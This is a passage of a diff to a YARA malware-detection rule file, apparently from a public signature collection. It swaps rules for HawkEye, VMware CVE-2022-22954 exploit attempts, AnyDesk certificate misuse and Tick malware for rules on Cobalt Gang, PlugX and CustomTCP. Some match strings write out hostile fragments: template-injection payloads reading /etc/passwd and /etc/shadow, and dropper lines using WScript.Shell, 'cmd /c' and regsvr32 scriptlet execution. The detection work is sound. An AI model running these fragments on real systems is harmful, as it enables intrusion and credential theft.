+		$seq2 = { a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 75 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc c7 45 f8 00 00 00 00 eb 19 8b 45 f8 05 e2 ff ff 7f 8d 14 00 8b 45 fc 01 d0 66 c7 00 01 00 83 45 f8 01 83 7d f8 3b 7e e1 8b 45 fc }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		filesize > 10KB and filesize < 10000KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Hawkeye_Keylogger_Gen_Dec18
+rule SIGNATURE_BASE_Cobaltstrike_CN_Group_Beacondropper_Aug17 : FILE
 {
 	meta:
-		description = "Detects HawkEye Keylogger Reborn"
+		description = "Detects Script Dropper of Cobalt Gang used in August 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1d06f364-a4e2-5632-ad3a-d53a8cddf072"
-		date = "2018-12-10"
+		id = "5631b0bc-9e25-524a-9003-73779fd492f7"
+		date = "2017-08-09"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/James_inthe_box/status/1072116224652324870"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hawkeye.yar#L20-L34"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cobaltgang.yar#L15-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b850f02849030d9912b7571e33e969427ac8f721d2f288ae3ac3e971c4ee4263"
+		logic_hash = "89db9c5f09afc9cb54fb7a9cd1490373c568ac4dc04bdb9ef71136f91e16ad2c"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad"
-
-	strings:
-		$s1 = "HawkEye Keylogger" fullword wide
-		$s2 = "_ScreenshotLogger" ascii
-		$s3 = "_PasswordStealer" ascii
-
-	condition:
-		2 of them
-}
-rule SIGNATURE_BASE_SUSP_EXPL_POC_Vmware_Workspace_ONE_CVE_2022_22954_Apr22_1 : CVE_2022_22954
-{
-	meta:
-		description = "Detects payload as seen in PoC code to exploit Workspace ONE Access freemarker server-side template injection CVE-2022-22954"
-		author = "Florian Roth"
-		id = "c1923d78-c339-584a-a47c-edff8f72fd0d"
-		date = "2022-04-08"
-		modified = "2025-03-29"
-		old_rule_name = "EXPL_POC_VMWare_Workspace_ONE_CVE_2022_22954_Apr22"
-		reference = "https://twitter.com/rwincey/status/1512241638994853891/photo/1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2022_22954_vmware_workspace_one.yar#L2-L33"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "20c1d55e29b777cca3cb8e92fbe45e23e6bbf972167dee8b0a012d9ff12f3841"
-		score = 60
-		quality = 85
-		tags = "CVE-2022-22954"
-
-	strings:
-		$x2 = "${\"freemarker.template.utility.Execute\"?new()("
-		$x3 = "cat /etc/passwd\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute"
-		$x4 = "cat /etc/passwd\\\")).(#execute=#instancemanager.newInstance(\\\"freemarker.template.utility.Execute"
-		$x5 = "cat /etc/shadow\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute"
-		$x6 = "cat /etc/shadow\\\")).(#execute=#instancemanager.newInstance(\\\"freemarker.template.utility.Execute"
-		$fpg1 = "All Rights"
-		$fpg2 = "<html"
-		$fpg3 = "<HTML"
-		$fpg4 = "Copyright" ascii wide
-		$fpg5 = "License"
-		$fpg6 = "<?xml"
-		$fpg7 = "Help" fullword
-		$fpg8 = "COPYRIGHT" ascii wide fullword
-		$fpg9 = "Backup"
-		$fp1 = "severity: critical"
-
-	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
-}
-rule SIGNATURE_BASE_LOG_SUSP_EXPL_POC_Vmware_Workspace_ONE_CVE_2022_22954_Apr22_ : CVE_2022_22954
-{
-	meta:
-		description = "Detects payload as seen in PoC code to exploit Workspace ONE Access freemarker server-side template injection CVE-2022-22954"
-		author = "Florian Roth"
-		id = "c54a3a7a-aafc-52d4-863c-ed254b0da527"
-		date = "2022-04-08"
-		modified = "2025-03-29"
-		old_rule_name = "EXPL_POC_VMWare_Workspace_ONE_CVE_2022_22954_Apr22"
-		reference = "https://twitter.com/rwincey/status/1512241638994853891/photo/1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2022_22954_vmware_workspace_one.yar#L36-L54"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c383f197da1e043e632c4d4de03fa7ff42e3fb6fa7824f326874446bcd13588"
-		score = 60
-		quality = 85
-		tags = "CVE-2022-22954"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fc0fad39b461eb1cfc6be57932993fcea94fca650564271d1b74dd850c81602f"
+		hash2 = "1c845bb0f6b9a96404af97dcafdc77f1629246e840c01dd9f1580a341f554926"
+		hash3 = "6206e372870ea4f363be53557477f9748f1896831a0cdef3b8450a7fb65b86e1"
 
 	strings:
-		$x1 = "66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28" ascii
-		$fp2 = "ModSecurity"
-		$fp3 = " 302 -"
-
-	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
-}
-
-rule SIGNATURE_BASE_PUA_Anydesk_Compromised_Certificate_Revoked_Jan24 : FILE
-{
-	meta:
-		description = "Detects binaries signed with a compromised signing certificate of AnyDesk (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8) after it was revoked. This is not a threat detection. It detects an outdated version of AnyDesk that was signed with a certificate that has been revoked."
-		author = "Florian Roth"
-		id = "eeefc9a5-1416-544b-b95e-c063000a4028"
-		date = "2024-02-05"
-		modified = "2024-04-24"
-		reference = "https://anydesk.com/en/public-statement"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_anydesk_compromised_cert_feb23.yar#L3-L17"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a1f148dbf15579bd6a65e7c93fa64f00ea481d6b314a444fa924a4604adb9a6d"
-		score = 50
-		quality = 85
-		tags = "FILE"
+		$x1 = "WriteLine(\"(new ActiveXObject('WScript.Shell')).Run('cmd /c c:/" ascii
+		$x2 = "WriteLine(\" (new ActiveXObject('WScript.Shell')).Run('regsvr32 /s" ascii
+		$x3 = "sh.Run(env('cmd /c set > %temp%" ascii
+		$x4 = "sh.Run('regsvr32 /s /u /i:" ascii
+		$x5 = ".Get('Win32_ScheduledJob').Create('regsvr32 /s /u /i:" ascii
+		$x6 = "scrobj.dll','********" ascii
+		$x7 = "www.thyssenkrupp-marinesystems.org" fullword ascii
+		$x8 = "f.WriteLine(\" tLnk=env('%tmp%/'+lnkName+'.lnk');\");" fullword ascii
+		$x9 = "lnkName='office 365'; " fullword ascii
+		$x10 = ";sh=x('WScript.Shell');" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" )
+		( filesize < 200KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_1 : FILE
+rule SIGNATURE_BASE_Cobaltgang_Malware_Aug17_1 : FILE
 {
 	meta:
-		description = "Detects binaries signed with a compromised signing certificate of AnyDesk that aren't AnyDesk itself (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; strict version)"
-		author = "Florian Roth"
-		id = "8d172b04-f7f7-54df-b30c-3ee17d3cca12"
-		date = "2024-02-02"
-		modified = "2024-04-24"
-		reference = "https://anydesk.com/en/public-statement"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_anydesk_compromised_cert_feb23.yar#L19-L36"
+		description = "Detects a Cobalt Gang malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "56c6f4f8-ccf5-5665-ac21-67f0a9b67cf1"
+		date = "2017-08-09"
+		modified = "2023-12-05"
+		reference = "https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cobaltgang.yar#L41-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1b2268b1efa09ee8578f4c1ae07617ac6bebeacd3ed50598a2fc2ec4d709baa7"
+		logic_hash = "46077106bd19dd38a714a220b887742f5a29424ac8eb89f469975f863b3782ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6d70673b723f338b3febc9f1d69463bdd4775539cb92b5a5d8fccc0d977fa2f0"
 
 	strings:
-		$a1 = "AnyDesk Software GmbH" wide
+		$s1 = "ServerSocket.EXE" fullword wide
+		$s2 = "Incorrect version of WS2_32.dll found" fullword ascii
+		$s3 = "Click 'Connect' to Connect to the Server.  'Disconnect' to disconnect from server." fullword wide
+		$s4 = "Click 'Start' to start the Server.  'Stop' to Stop it." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and not $a1 and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
 }
-rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_2 : FILE
+rule SIGNATURE_BASE_Cobaltgang_Malware_Aug17_2 : FILE
 {
 	meta:
-		description = "Detects binaries signed with a compromised signing certificate of AnyDesk that aren't AnyDesk itself (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; permissive version)"
-		author = "Florian Roth"
-		id = "a41af8d8-ebdf-5a2f-8cf5-abd4587bdfc5"
-		date = "2024-02-02"
-		modified = "2024-04-24"
-		reference = "https://anydesk.com/en/public-statement"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_anydesk_compromised_cert_feb23.yar#L38-L56"
+		description = "Detects a Cobalt Gang malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2839c119-0fa4-51f0-a406-5d381cc594a2"
+		date = "2017-08-09"
+		modified = "2023-12-05"
+		reference = "https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cobaltgang.yar#L59-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "86f708233d5a6a46d367430dcc65b128e8dc7ec24eda774ff3860101cc16c9fc"
-		score = 65
+		logic_hash = "54095d2f447b6478aefe956133fb9b97171c1e07d7d9186a70bf242a094e4156"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "80791d5e76782cc3cd14f37f351e33b860818784192ab5b650f1cdf4f131cf72"
 
 	strings:
-		$sc1 = { 0D BF 15 2D EA F0 B9 81 A8 A9 38 D5 3F 76 9D B8 }
-		$s2 = "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1"
-		$f1 = "AnyDesk Software GmbH" wide
+		$s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENGB)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20000KB and all of ( $s* ) and not 1 of ( $f* )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
 
-rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_3 : FILE
+rule SIGNATURE_BASE_MAL_CRIME_Cobaltgang_Malware_Oct19_1 : FILE
 {
 	meta:
-		description = "Detects binaries signed with a compromised signing certificate of AnyDesk after it was revoked (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; version that uses dates for validation)"
-		author = "Florian Roth"
-		id = "9610e61c-25d7-53e8-ba3f-b78b3d108aa3"
-		date = "2024-02-02"
-		modified = "2024-04-24"
-		reference = "https://anydesk.com/en/public-statement"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_anydesk_compromised_cert_feb23.yar#L58-L77"
+		description = "Detects CobaltGang malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "95c16016-b09b-56f3-b5a4-fca18ac70ad5"
+		date = "2019-10-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/vxsh4d0w/status/1187353649015611392"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cobaltgang.yar#L74-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fdd1068abfba52c9a40fd2b6628a5c67775eb31815e6d53bfc4655080d9b240e"
+		logic_hash = "4bd57aa6929b3eced7dee8063d89c542f2c80f802ef40efc23bbea6cc8ffd98c"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "72125933265f884ceb8ab64ab303ea76aaeb7877faee8976d398acd0d0b7356b"
+		hash2 = "893339624602c7b3a6f481aed9509b53e4e995d6771c72d726ba5a6b319608a7"
+		hash3 = "3c34bbf641df25f9accd05b27b9058e25554fdfea0e879f5ca21ffa460ad2b01"
+
+	strings:
+		$op_a1 = { 0f 44 c2 eb 0a 31 c0 80 fa 20 0f 94 c0 01 c0 5d }
+		$op_b1 = { 89 e5 53 8b 55 08 8b 4d 0c 8a 1c 01 88 1c 02 83 }
+		$op_b2 = { 89 e5 53 8b 55 08 8b 45 0c 8a 1c 0a 88 1c 08 83 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" and ( pe.signatures [ i ] . not_before > 1706486400 or pe.timestamp > 1706486400 ) )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( pe.imphash ( ) == "d1e3f8d02cce09520379e5c1e72f862f" or pe.imphash ( ) == "8e26df99c70f79cb8b1ea2ef6f8e52ac" or ( $op_a1 and 1 of ( $op_b* ) ) )
 }
-
-rule SIGNATURE_BASE_APT_Tick_Sysmon_Loader_Jun18 : FILE
+rule SIGNATURE_BASE_Codoso_Plugx_3 : FILE
 {
 	meta:
-		description = "Detects Sysmon Loader from Tick group incident - Weaponized USB"
+		description = "Detects Codoso APT PlugX Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eae013c3-4774-5342-bd1a-5f2825612747"
-		date = "2018-06-23"
+		id = "55066812-3a8e-5099-afb4-ff7a59f1ccb2"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-tick-group-weaponized-secure-usb-drives-target-air-gapped-critical-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tick_weaponized_usb.yar#L13-L38"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L11-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e6256269409322a4f48bfdaafc52f5ec83602cf66f2e3b8d83ed5175e1dc506f"
+		hash = "74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3"
+		logic_hash = "51615c2583bb672f148f216e4856e7e346b17884f0740d69f6a24f08b594bda4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "31aea8630d5d2fcbb37a8e72fe4e096d0f2d8f05e03234645c69d7e8b59bb0e8"
 
 	strings:
-		$x1 = "SysMonitor_3A2DCB47" fullword ascii
-		$s1 = "msxml.exe" fullword ascii
-		$s2 = "wins.log" fullword ascii
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run" fullword ascii
-		$s4 = "%2d-%2d-%2d-%2d" fullword ascii
-		$s5 = "%USERPROFILE%" fullword ascii
-		$s6 = "Windows NT" fullword ascii
-		$s7 = "device monitor" fullword ascii
-		$s8 = "\\Accessories" ascii
+		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
+		$s2 = "mcs.exe" fullword ascii
+		$s3 = "McAltLib.dll" fullword ascii
+		$s4 = "WinRAR self-extracting archive" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "c5bb16e79fb500c430edce9481ae5b2b" or $x1 or 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1200KB and all of them
 }
-rule SIGNATURE_BASE_APT_Tick_Homamdownloader_Jun18 : FILE
+rule SIGNATURE_BASE_Codoso_Plugx_2 : FILE
 {
 	meta:
-		description = "Detects HomamDownloader from Tick group incident - Weaponized USB"
+		description = "Detects Codoso APT PlugX Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8ec52cb7-41a4-50a9-9cb1-23bee354680f"
-		date = "2018-06-23"
+		id = "0402a0ff-5664-52db-a739-51c5181853f8"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-tick-group-weaponized-secure-usb-drives-target-air-gapped-critical-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tick_weaponized_usb.yar#L40-L58"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b4c798aa0c71f44f271e710d791c97adcbf9bd28ec87dd1d8d589029e58d1cfb"
+		hash = "b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb"
+		logic_hash = "5ee652a135d4865340d2ce6421144ec76ccc7ab69704e92904b2e2ebfc72edfc"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f817c9826089b49d251b8a09a0e9bf9b4b468c6e2586af60e50afe48602f0bec"
 
 	strings:
-		$s1 = "cmd /c hostname >>" fullword ascii
-		$s2 = "Mstray.exe" fullword ascii
-		$s3 = "msupdata.exe" fullword ascii
-		$s5 = "Windows\\CurrentVersion\\run" fullword ascii
-		$s6 = "Content-Type: */*" fullword ascii
-		$s11 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" fullword ascii
+		$s1 = "%TEMP%\\HID" fullword wide
+		$s2 = "%s\\hid.dll" fullword wide
+		$s3 = "%s\\SOUNDMAN.exe" fullword wide
+		$s4 = "\"%s\\SOUNDMAN.exe\" %d %d" fullword wide
+		$s5 = "%s\\HID.dllx" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them ) or all of them
 }
-rule SIGNATURE_BASE_Rocketkitten_Keylogger : FILE
+rule SIGNATURE_BASE_Codoso_Customtcp_4 : FILE
 {
 	meta:
-		description = "Detects Keylogger used in Rocket Kitten APT"
+		description = "Detects Codoso APT CustomTCP Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "558341db-a30d-586e-8efc-0fff1d8f94a1"
-		date = "2015-09-01"
+		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/SjQhlp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rocketkitten_keylogger.yar#L8-L35"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L46-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c8523a50075c6ee9675d37d870da55d9e6193bbc770f6b916e700ab9aad438cc"
+		logic_hash = "fcabbd37acf75e1233894682e77abad95a849ed68c7e8ce2690dde03d8160f8b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1c9e519dca0468a87322bebe2a06741136de7969a4eb3efda0ab8db83f0807b4"
-		hash2 = "495a15f9f30d6f6096a97c2bd8cc5edd4d78569b8d541b1d5a64169f8109bc5b"
+		hash1 = "ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0"
+		hash2 = "130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8"
+		hash3 = "3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa"
+		hash4 = "02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13"
 
 	strings:
-		$x1 = "\\Release\\CWoolger.pdb" ascii
-		$x2 = "WoolenLoger\\obj\\x86\\Release" ascii
-		$x3 = "D:\\Yaser Logers\\"
-		$z1 = "woolger" fullword wide
-		$s1 = "oShellLink.TargetPath = \"" fullword ascii
-		$s2 = "wscript.exe " fullword ascii
-		$s3 = "strSTUP = WshShell.SpecialFolders(\"Startup\")" fullword ascii
-		$s4 = "[CapsLock]" fullword ascii
+		$x1 = "varus_service_x86.dll" fullword ascii
+		$s1 = "/s %s /p %d /st %d /rt %d" fullword ascii
+		$s2 = "net start %%1" fullword ascii
+		$s3 = "ping 127.1 > nul" fullword ascii
+		$s4 = "McInitMISPAlertEx" fullword ascii
+		$s5 = "sc start %%1" fullword ascii
+		$s6 = "net stop %%1" fullword ascii
+		$s7 = "WorkerRun" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or ( $z1 and 2 of ( $s* ) ) ) ) or ( $z1 and all of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 5 of them ) or ( $x1 and 2 of ( $s* ) )
 }
-
-rule SIGNATURE_BASE_SUSP_Unsigned_Googleupdate : FILE
+rule SIGNATURE_BASE_Codoso_Customtcp_3 : FILE
 {
 	meta:
-		description = "Detects suspicious unsigned GoogleUpdate.exe"
+		description = "Detects Codoso APT CustomTCP Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2575b882-3526-5c42-9d50-83fb0b7df3f5"
-		date = "2019-08-05"
+		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_google_anomaly.yar#L3-L22"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L72-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e333ac773927e2ed1f6aa4d6bbcb63d67bcc8d18d732a84bb68cb503469b247"
-		score = 60
+		hash = "d66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090"
+		logic_hash = "fb486985587fc28c45cbdf6a63550e60e8d6c18f218544adc19c5604193fe8ea"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ac1 = { 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C
-               00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65
-               00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55
-               00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78
-               00 65 }
+		$s1 = "DnsApi.dll" fullword ascii
+		$s2 = "softWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%s" ascii
+		$s3 = "CONNECT %s:%d hTTP/1.1" ascii
+		$s4 = "CONNECT %s:%d HTTp/1.1" ascii
+		$s5 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)" ascii
+		$s6 = "iphlpapi.dll" ascii
+		$s7 = "%systemroot%\\Web\\" ascii
+		$s8 = "Proxy-Authorization: Negotiate %s" ascii
+		$s9 = "CLSID\\{%s}\\InprocServer32" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $ac1 and pe.number_of_signatures < 1
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 5 of them ) or 7 of them
 }
-rule SIGNATURE_BASE_EXP_Drivecrypt_1 : FILE
+rule SIGNATURE_BASE_Codoso_Customtcp_2 : FILE
 {
 	meta:
-		description = "Detects DriveCrypt exploit"
+		description = "Detects Codoso APT CustomTCP Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c192ca53-1de3-5d2d-a216-47e534ff4d01"
-		date = "2018-08-21"
+		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_drivecrypt.yar#L2-L17"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L94-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1959f2e4838e40f2abc26ee16b03089088c96cafb101125bdc346f69fe76d7a4"
+		hash = "3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3"
